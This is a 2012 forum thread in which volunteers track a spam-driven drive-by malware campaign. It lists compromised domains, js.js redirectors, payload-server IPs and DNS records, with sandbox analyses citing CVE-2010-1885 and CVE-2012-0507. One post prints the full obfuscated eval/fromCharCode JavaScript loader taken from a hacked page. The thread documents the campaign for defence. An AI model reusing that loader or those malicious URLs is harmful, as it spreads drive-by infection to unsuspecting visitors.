Numerous malware drive by attempts

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Apr 05, 2012 4:55 pm

140 Examples of URLs month to date that fit the format aceite.baurubkt.com.br/XTbWCY0y/index.html
Code: Select all
aceite.baurubkt.com.br
agapesaudeeestetica.com.br
alecarneiro.com.ar
aluguelciroimoveis.com.br
alumbradocatamarca.com.ar
anamariafitness.com.br
areiaana.com.br
arteestofaria.com.br
audio.peristaltika.com
barroso.mg.gov.br
bdeclinic.com.br
beckervideo.com.br
bedstodayonline.co.uk
blessingtour.com.br
boidamanta.com.br
borbis.home.pl
boutiquecoisasdemulher.com.br
camboatas.com.br
camboriucombateapedofilia.com.br
carmauto.com.br
casadacriancadobrasil.org.br
casadopisoindustrial.com.br
casamentosnanet.com.br
celikaydahiliticaret.com.tr
celtichearttattoo.co.uk
cfcbarravelha.com.br
cfcsouzaitajai.com.br
chayanam.pcriot.com
chocolatta.com.ar
ciaasaford.com.br
coisetamuchastegui.com.ar
contabilidadesuprema.com.br
corsiedilizia.topschool.it
cursosdeprogramacao.com.br
decoragyn.com.br
demo.syndicationradio.com
dev.hawaiitobaccocontrol.org
differenzaseguros.com.br
discern.com.tw
dismarlub.com.br
dlsnoba.org.ar
drywalltec.com.pe
dtcobaglung.gov.np
ebanodecor.com.br
elegant2.dev50.com
eliteworldhotel.com.tr
encoder.com.tr
esteticanovaphase.com.br
estovale.com.br
extremix.com.ar
fablabbudapest.zzl.org
festaseventosratimbum.com.br
freeimvucredits.altervista.org
ftp.bazingaup.hd1.com.br
ftp.blabben.com
ftp.clickhost.com
ftp.dressrail.com
ftp.fabiosampa.com.br
ftp.halsat.sk
ftp.kbsports.sk
ftp.motoron.saab900.hu
ftp.nimos.org
ftp.pontocomsistemas.com
gabrielemartufi.altervista.org
galleryshoponline.co.za
gastroseventos.com.br
getaway.com.br
goldomus.nuvola365.it
graficapontocor.com.br
grupozemaria.com.br
guessar.com.br
gunabaticollege.edu.bd
handicapdeportes.com.ar
haskellcosmeticos.com.br
heregospel.com.br
hotelpousadafeliz.com.br
hotelsofnewdelhi.co.in
javor.com.br
jornalcnn.com.br
kerastase.nohup.it
kharismacargo.com.br
knap.in.rs
lacasadivalentina.nurunadv.com
lavanderiatingimento.com.br
ledmodels.com.br
left.thinkpunk.net
lifenow.org.uk
linguagemc.com.br
lojaarainha.com.br
lojainconfidencia.com.br
macasdemassagem.com.br
macielcarburadores.com.br
mapaviagens.com.br
mashigiene.com.ar
mccanndigital.com.co
mocarski.csh.pl
ofb.com.br
okutanpetrol.com.tr
oliveira4x4.com.br
omenterprisespune.co.in
pastaegrill.com.br
perfumsjb.zxq.net
phatconcepts.co.za
pianco.com.br
plascombritadores.com.br
quickpdf.50webs.com
radiogloriaadeus.com.br
ramunas.myartsonline.com
s399270837.websitehome.co.uk
scequipamentos.com.br
scoalapelinie.biz.nf
scoalapelinie.host.org
scrondnews24.altervista.org
sdlceku.co.in
somostigreros.com.ve
splithouseclimatizacao.com.br
srilankanet.bplaced.de
stifte.bplaced.net
terracoffee.com.ar
test.ilkserver.com
thesteeldetailingcompany.co.uk
tomdev.blym.org.uk
tome1234.webd.pl
topseoz.co.uk
twins.99k.org
twins2.99k.org
urbannex.co.za
vajuco12.o2switch.net
vehivavy.to.mg
walterguerra.art.br
wbhost.com.br
wificomputacion.com.ar
winedeskwaterfront.co.za
wiseit.com.my
wl22www838.webland.ch
wl32www1024.webland.ch
wolumen.home.pl
wongtemen.awardspace.us
worldwidefitness.co.in
wp10635274.wp271.webpack.hosteurope.de
www.atiladagtekin.com
www.comprasemrivera.com.br
www.quefollon.com
xmweb.6te.net
xraytunnel.zxq.net
ycww06180.zxq.net
yildizliguven.com.tr
zillertal.bplaced.net
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Apr 05, 2012 5:00 pm

There is only a small list of the random 8-character strings in these URLs. Out of 4,300 spammed URLs, and the above list of 140 domains, there are only 83
Code: Select all
0drnFhv7
1DvRtt7n
2HGyrfcS
2jp9AXAH
2qkQiMnF
3QZfWkhm
3zQeaNM3
40MVPL5A
45FduQJY
4txGy2fG
4yFr4xcK
4YT5yyBC
69XNZPEL
6D9UsT0U
6NdA66bR
7zVC6k3E
9ZT4hYfA
Afk3VXew
B5zgKR6Q
bbbphBAk
bfoDbwx9
bgJcXXRW
BhuiKoYb
bssCfPt7
c1LRK0ZP
C6dySjCV
cQr1Vwmc
CrdtoUx7
csy0DLtH
DnAp2Ghm
eorgFm72
eRUenRwz
fNEvTRU8
fsXAfd1c
G9sqcmby
GnZEAt4J
GSx77DTJ
GygpiJU2
HavsLLhq
jm8MjLwp
jRznQAtZ
JYsmHbAz
KEwcYqDR
kLVbyQJd
KNcdZkVP
KSSCc2L5
KWDLcEzD
KyEy67xZ
Nv8QYtkR
NYgzXnp0
o4qG9xyx
oQAJ1oDK
PHHZUajw
Puuy2Ats
PX34vf6P
Q9eXxDD9
QM52AoSo
QRtcuNBr
QTsYkFyh
rU8AcofP
rZSbBfZu
s3JgEpEu
sjFbaiZp
sKGtsgD9
tMYmWbcC
UpH1sBvS
V0s1S0nt
vBWtU4Fm
VCuA8Z5E
VTac3eXG
X9uJsv2d
XTbWCY0y
XwL6fwpr
XyG0BwzJ
Y9nEKFsH
yFxapB05
YY7LVHna
Z2bg1Pij
ZGhsFpjH
zh6jPwn1
zhN50DKp
ZQe8w6UJ
zUGqdj5E
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Tue Apr 24, 2012 4:11 pm

This malware operation has gone though at least three (payload-bearing) IP addresses today:

188.165.65.221 (see the analysis at http://wepawet.iseclab.org/view.php?has ... 44&type=js )
208.117.43.8 (see http://wepawet.iseclab.org/domain.php?h ... 05&type=js )
72.46.137.57 (most recent; see http://wepawet.iseclab.org/view.php?has ... 00&type=js )

A few examples of the URLs that it has been using today are listed at

http://www.mywot.com/en/forum/21464-qai ... ent-138524
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu May 10, 2012 11:43 am

NotBuyingIt wrote: Perhaps the repeated revisions of the JavaScript files is a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.
I think the botnet is close to using an ensemble of JavaScript files as something like a fast-flux ploy. An ensemble of files, each on a different (hacked) site, is probably less vulnerable to getting shut down than a single DNS domain would be. I currently see the following ensemble of JavaScript redirectors being used [edited to show changed status]

desiremobile.netfirms.com/i7K1Gp1g/js.js
hoteldooars.in/DbL72xH1/js.js
nisanurum.com/e7pFkjut/js.js [suspended]
pricedrightviewhomes.com/QiGaWKkT/js.js [HTTP 404]
s270915069.onlinehome.fr/go3wLLiK/js.js [HTTP 404]
shokani.net/YvKDGVwn/js.js
smithrz.hosting4less.com/CGrzhxx1/js.js [HTTP 403]
urbannex.co.za/SVVsEJwY/js.js [HTTP 404]

I currently see the following IP addressees being used, one at a time, as the redirection target.

69.194.194.90
98.158.129.17
173.236.88.179
174.140.168.175
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu May 24, 2012 12:59 pm

The service at jsunpack.jeek.org has been very helpful when examining (and documenting) the hacked sites that have been used in the drive-by / blackhole exploit. Unfortunately, it has only been responding with 'No space left on device' error messages for several days.

[Edit: Update] jsunpack.jeek.org has returned to service in early June.
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Jun 07, 2012 4:33 am

NotBuyingIt wrote:The intermediate JavaScript files seem to be revised from time to time to alter the redirection target. Perhaps the repeated revisions of the JavaScript files is a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.

I now see some circumstantial evidence that my speculation was accurate. The particular botnet uses various js.js files which all redirect to the same (putative) nginx server where malware installs are attempted. The JavaScript files in a currently botnet campaign are slowly alternating their redirection target in a coordinated manner among several sites hosting its server. Here are some of the target sites that are currently in used in the alternation

108.166.65.182:8080
nolgo.com:8080
69.194.196.34
204.145.80.216
64.111.24.122

I cannot claim that the alternation was intentionally developed to substitute for the fast flux ploy. It may just as well be described as an ad hoc occurrence instead of an under-development ploy. I continue to chronicle the sites exploited by the botnet at http://www.mywot.com/en/forum/21464-qai ... -2010-1885
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Wed Jun 13, 2012 1:06 am

Only a few days after I hypothesized an elaborate network, it appears to have fallen into disarray and the surviving zombie sites seem uncoordinated.

What could have happened?
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby Red Dwarf » Wed Jun 13, 2012 5:21 pm

6 days ago
ajppromocoesartisticas.com.br
archives.zxq.net
carandclassic.host.org
ftp.oblivious.taess.net
ftp.restorationonline.com.au
helitav.altervista.org
mondoorso.altervista.org
slsb.com.my
uportal.cloudaccess.net
web.piecraft.co.uk
www.alibostan.com
www.amaituoiocchi.it
www.dewaltdirect.com
www.incredibleandamans.com
www.laclaregroup.com
zehava.org.il

5 days ago
ajppromocoesartisticas.com.br
archives.zxq.net
carandclassic.host.org
ftp.oblivious.taess.net
helitav.altervista.org
mondoorso.altervista.org
slsb.com.my
uportal.cloudaccess.net
web.piecraft.co.uk
www.alibostan.com
www.amaituoiocchi.it
www.laclaregroup.com
zehava.org.il

4 days ago
ftp.oblivious.taess.net
slsb.com.my

3 days ago
none

2 days ago
ajppromocoesartisticas.com.br
helitav.altervista.org
slsb.com.my
www.laclaregroup.com
zehava.org.il

1 day ago
none

today
none

It does seem to be tapering off.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Jun 14, 2012 1:27 am

Red Dwarf wrote:It does seem to be tapering off.


I suspect that it may have been replaced by an older style fast flux botnet (without the js.js files) with the payload site at

saprolaunimaxim.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
173.224.209.130:8080/forum/showthread.php?page=5fa58bce769e5c2c
78.83.233.242:8080/forum/showthread.php?page=5fa58bce769e5c2c

(Analysis at http://wepawet.iseclab.org/view.php?hash=1b46c8b7116e264981a21f5cb2103c61&t=1339650959&type=js)

After the infections are attempted, the exploit redirects to google.de

It uses a differerent template for the deceptive URLs in its spam. For example:

www.rango.me/mail.htm
www.gift-book.sp.ru/mail.htm
solveigedda.com/mail.htm
www.gift-book.sp.ru/mail.htm
goalsforgirls.org/mail.htm
themostaffordableinsurance.com/mail.htm
www.ed.cl/mail.htm

(Analysis at http://urlquery.net/report.php?id=67642)

I've been noticing it for two days or so, but I have been too preoccupied with posting ill-tempered remarks on myWOT to characterize it adequately.
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby AlphaCentauri » Thu Jun 14, 2012 12:13 pm

NotBuyingIt wrote:I've been noticing it for two days or so, but I have been too preoccupied with posting ill-tempered remarks on myWOT to characterize it adequately.


Trying to keep my cool on the WOT forum makes me think of the Bob Dylan Lyrics:
In a soldier's stance, I aimed my hand
At the mongrel dogs who teach
Fearing not that I'd become my enemy
In the instant that I preach
My existence led by confusion boats
Mutiny from stern to bow
Ahh, but I was so much older then
I'm younger than that now
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Jun 14, 2012 6:56 pm

Are these all examples? Found over the last 3 days but not before that
Code: Select all
aymeric.pansu.net/mail.htm
blog.yourls.org/mail.htm
guitar.nyanta.jp/m/mail.htm
igeek.org.gg/mail.htm
ker.cal24.pl/mail.htm
printhouse.inf.br/images/mail.htm
sonjamarinkovic.edu.rs/mail.htm
webmail.firstbaja.com/mail.htm
www.aleco.co.rs/mail.htm
www.arhitrav.rs/mail.htm
www.bjhbxn.com/mail.htm
www.cppidf8.fr/plugins/fckeditor/FCKeditor/editor/plugins/ajaxfilemanager/inc/mail.htm
www.deveducation.co.in/mail.htm
www.ed.cl/mail.htm
www.kiraken.co.jp/admin/mail.htm
www.neimarkg.rs/mail.htm
www.paz.cl/mail.htm
www.portalminassaude.com.br/javascript/tiny_mce/plugins/ajaxfilemanager/inc/mail.htm
www.rango.me/mail.htm
www.snd.org.rs/katalog/mail.htm


Live site payload:
Code: Select all
<h1><b>Please Wait... Loading...</h1></b>

<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";
e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,1
96,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,21
8,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,230,291,448,114,222,324,388,117,220,315,
436,97,240,315,436,46,228,351,232,56,96,168,192,47,204,333,456,117,218,141,460,104,222,357,464,104,228,303,388,100,92,336,416,112,126,336,388,103,202,183,212,10
2,194,159,224,98,198,303,220,54,114,303,212,99,100,297,156,32,238,315,400,116,208,183,156,49,96,117,128,104,202,315,412,104,232,183,156,49,96,117,128,115,232,36
3,432,101,122,117,472,105,230,315,392,105,216,315,464,121,116,312,420,100,200,303,440,59,224,333,460,105,232,315,444,110,116,291,392,115,222,324,468,116,202,177
,432,101,204,348,232,48,118,348,444,112,116,144,236,39,124,180,188,105,204,342,388,109,202,186,136,41,118,39,36,9,250,39,36,9,204,351,440,99,232,315,444,110,64,
315,408,114,194,327,404,114,80,123,492,13,18,27,36,118,194,342,128,102,64,183,128,100,222,297,468,109,202,330,464,46,198,342,404,97,232,303,276,108,202,327,404,
110,232,120,156,105,204,342,388,109,202,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,230,342,396,39,88,117,416,116,232,336,232,47,9
4,345,388,112,228,333,432,97,234,330,420,109,194,360,420,109,92,342,468,58,112,144,224,48,94,306,444,114,234,327,188,115,208,333,476,116,208,342,404,97,200,138,
448,104,224,189,448,97,206,303,244,53,204,291,212,56,196,297,404,55,108,171,404,53,198,150,396,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,
216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,
177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464
,114,210,294,468,116,202,120,156,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,
208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,40
4,40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375];if(window.document)for(i=6-2-1-2-1;-655+i!=
2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}}</script>
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Jun 14, 2012 7:16 pm

The target site details
domain: SAPROLAUNIMAXIM.RU
nserver: ns1.saprolaunimaxim.ru. 62.213.64.161 [RU]
nserver: ns2.saprolaunimaxim.ru. 62.76.189.62 [RU]
nserver: ns3.saprolaunimaxim.ru. 85.214.204.32 [DE]
nserver: ns4.saprolaunimaxim.ru. 50.57.88.200 [Rackspace, US]
nserver: ns5.saprolaunimaxim.ru. 41.66.137.155 [ZA]
nserver: ns6.saprolaunimaxim.ru. 50.57.43.49 [Rackspace, US]
state: REGISTERED, NOT DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.06.05
paid-till: 2013.06.05
free-date: 2013.07.06

Host SAPROLAUNIMAXIM.RU not found: 3(NXDOMAIN)
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Jun 14, 2012 11:21 pm

Red Dwarf wrote:Are these all examples? Found over the last 3 days but not before that

Yes, the URLs which attempt to contact saprolaunimaxim.ru participate in the exploit. A seventh "NS" record for saprolaunimaxim.ru in not currently being reported; it was IP 184.106.189.124

The two old "A" records for saprolaunimaxim.ru which are not currently being reported by its DNS still host the payload site; they are IP 173.224.209.130 and IP 78.83.233.242
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Fri Jun 15, 2012 3:02 pm

I've come across some fresh reports of a botnet which is using js.js files instead of a fast flux tactic. My lists today are at http://www.mywot.com/en/forum/21464-qai ... ent-146928
NotBuyingIt
Spammer Killing Machine
 
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Jun 15, 2012 5:48 pm

Refer Wepawet analysis

http://wepawet.iseclab.org/view.php?has ... 13&type=js
for spammed URL
Code: Select all
   http://www.sudas.com.cn/mail.htm


Summary:
Code: Select all
In particular, the following URLs were found to contain malicious content:

    http://sumatranajuge.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
    http://sumatranajuge.ru:8080/forum/REST.jar

Exploits
Name . . .   Description . . .   Reference
HPC URL . . .   Help Center URL Validation Vulnerability    . . . CVE-2010-1885
AtomicReferenceArray unsafe typing . . .   Type safety violation in the AtomicReferenceArray class . . .   CVE-2012-0507


Target:
sumatranajuge.ru has address 173.224.209.130 [Psychz Networks, Walnut, CA, US]
sumatranajuge.ru has address 213.17.171.186 [Warsaw, PL]
sumatranajuge.ru has address 78.83.233.242 [MVN Systems Ltd. BG]
sumatranajuge.ru has address 110.234.176.99 [New Delhi, IN]

Name servers
ns1.sumatranajuge.ru. 62.213.64.161
ns2.sumatranajuge.ru. 62.76.189.62
ns3.sumatranajuge.ru. 85.214.204.32
ns4.sumatranajuge.ru. 50.57.88.200
ns5.sumatranajuge.ru. 41.66.137.155
ns6.sumatranajuge.ru. 50.57.43.49

[EDIT June 18]
domain: SUMATRANAJUGE.RU
nserver: ns1.sumatranajuge.ru. 62.213.64.161
nserver: ns2.sumatranajuge.ru. 62.76.189.62
nserver: ns3.sumatranajuge.ru. 85.214.204.32
nserver: ns4.sumatranajuge.ru. 50.57.88.200
nserver: ns5.sumatranajuge.ru. 41.66.137.155
nserver: ns6.sumatranajuge.ru. 50.57.43.49
state: REGISTERED, NOT DELEGATED, UNVERIFIED
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

PreviousNext

Return to Malware

Who is online

Users browsing this forum: No registered users and 1 guest